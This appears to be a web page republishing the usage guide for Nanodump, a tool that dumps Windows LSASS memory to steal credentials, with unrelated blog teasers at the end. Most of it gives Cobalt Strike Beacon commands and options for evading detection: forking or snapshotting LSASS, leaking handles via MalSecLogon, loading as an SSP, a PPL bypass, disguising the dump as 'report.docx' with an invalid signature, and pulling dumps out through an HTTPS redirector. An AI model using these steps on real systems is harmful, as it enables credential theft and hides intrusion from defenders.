Nanodump, a flexible tool that creates a minidump of the LSASS process.
git clone https://github.com/helpsystems/nanodump.git
On Linux with MinGW
On Windows with MSVC (No BOF support)
nmake -f Makefile.msvc
Import the NanoDump.cna script on Cobalt Strike.
Run the nanodump command in the Beacon console.
beacon> nanodump
Once you downloaded the minidump, restore the invalid signature
scripts/restore_signature
To avoid opening a handle to LSASS with PROCESS_VM_READ, you can use the --fork parameter.
This will make nanodump create a handle to LSASS with PROCESS_CREATE_PROCESS access and then create a ‘clone’ of the process. This new process will then be dumped. While this will result in a process creation and deletion, it removes the need to read LSASS directly.
Similarly to the --fork option, you can use --snapshot to create a snapshot of the LSASS process.
This will make nanodump create a handle to LSASS with PROCESS_CREATE_PROCESS access and then create a snapshot of the process using PssNtCaptureSnapshot. This new process will then be dumped. The snapshot will be freed automatically upon completion.
As opening a handle to LSASS can be detected, nanodump can instead search for existing handles to LSASS.
If one is found, it will copy it and use it to create the minidump.
Note that it is not guaranteed to find such handle.
To avoid opening a handle to LSASS, you can use MalSecLogon, which is a technique that (ab)uses CreateProcessWithLogonW to leak an LSASS handle.
To enable this feature, use the --malseclogon parameter.
Take into account that an unsigned nanodump binary needs to be written to disk to use this feature.
As said before, using MalSecLogon requires a nanodump binary to be written to disk.
This can be avoided if --malseclogon and --dup are used together with --binary.
The trick is to leak a handle to LSASS using MalSecLogon, but instead of leaking it into nanodump.exe, leak it into another binary and then duplicate the leaked handle so that nanodump can used it.
You can load nanodump as an SSP in LSASS to avoid opening a handle. The dump will be written to disk with an invalid signature at C:\Windows\Temp\report.docx by default. Once the dump is completed, DllMain will return FALSE to make LSASS unload the nanodump DLL.
To change the dump path and signature configuration, modify the function NanoDump in entry.c and recompile.
If used with no parameters, an unsigned nanodump DLL will be uploaded to the Temp folder. Once the dump has been created, manually delete the DLL with the delete_file command.
beacon> load_ssp
beacon> delete_file C:\Windows\Temp[RANDOM].dll
If LSASS is running as Protected Process Light (PPL), you can try to bypass it using a userland exploit discovered by Project Zero. If it is successful, the dump will be written to disk.
To access this feature, use the nanodump_ppl command
beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp
Get PID of LSASS and leave.
This is just for convenience, nanodump does not need the PID of LSASS.
Where to write the dumpfile.
The minidump will have a valid signature.
If not entered, the signature will be invalid. Before analyzing the dump restore the signature of the dump, with:scripts/restore_signature <dumpfile>
Fork LSASS and dump this new process.
Create a snapshot of LSASS and dump this new process.
Try to find an existing handle to LSASS and duplicate it.
Leak a handle to LSASS using MalSecLogon.
If used as BOF, an unsigned binary will be written to disk unless –dup is also provided!
Path to a binary such as C:\Windows\notepad.exe.
This option is used exclusively with --malseclogon and --dup.
Read LSASS indirectly by creating a fork and write the dump to disk with an invalid signature:
beacon> nanodump –fork –write C:\lsass.dmp
Use MalSecLogon to leak an LSASS handle in a notepad process, duplicate that handle to get access to LSASS, then read it indirectly by creating a fork and download the dump with a valid signature:
beacon> nanodump –malseclogon –dup –fork –binary C:\Windows\notepad.exe –valid
Get a handle with MalSecLogon, read LSASS indirectly by using a fork and write the dump to disk with a valid signature (a nanodump binary will be uploaded!):
beacon> nanodump –malseclogon –fork –valid –write C:\Windows\Temp\lsass.dmp
If you are using an HTTPS redirector (as you should), you might run into issues when downloading the dump filessly due to the size of the requests that leak the dump.
Increase the max size of requests on your web server to allow nanodump to download the dump.
location ~ ^…$ {
…
client_max_body_size 50M;
}
Apache2
LimitRequestBody 52428800
Learning Without Walls Remote education has long been a lifeline for students in rural areas…
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…